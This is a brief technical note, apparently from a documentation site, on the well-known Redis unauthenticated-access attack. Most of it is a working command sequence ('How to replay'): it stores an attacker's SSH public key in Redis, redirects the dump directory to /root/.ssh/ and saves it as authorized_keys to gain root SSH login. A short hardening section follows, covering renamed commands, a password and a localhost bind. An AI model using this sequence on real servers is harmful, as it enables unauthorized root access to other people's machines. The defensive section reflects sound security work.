Redis Hack
Remote login
How to replay
ssh-keygen –t rsa
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo
$ cat foo | redis-cli -h $remote_ip -x set crack
$ redis-cli -h $remote_ip
# in redis CLI
config set dir /root/.ssh/
config get dir
config set dbfilename "authorized_keys"
# save /root/.ssh/authorized_keys
save
How to avoid
# redis.conf
# disable to change dbfilename via remote connetion
rename-command FLUSHALL ""
rename-command CONFIG ""
rename-command EVAL ""
requirepass mypassword
bind 127.0.0.1
groupadd -r redis && useradd -r -g redis redis
最后修改 2023-03-11: split into more parts (54b443e)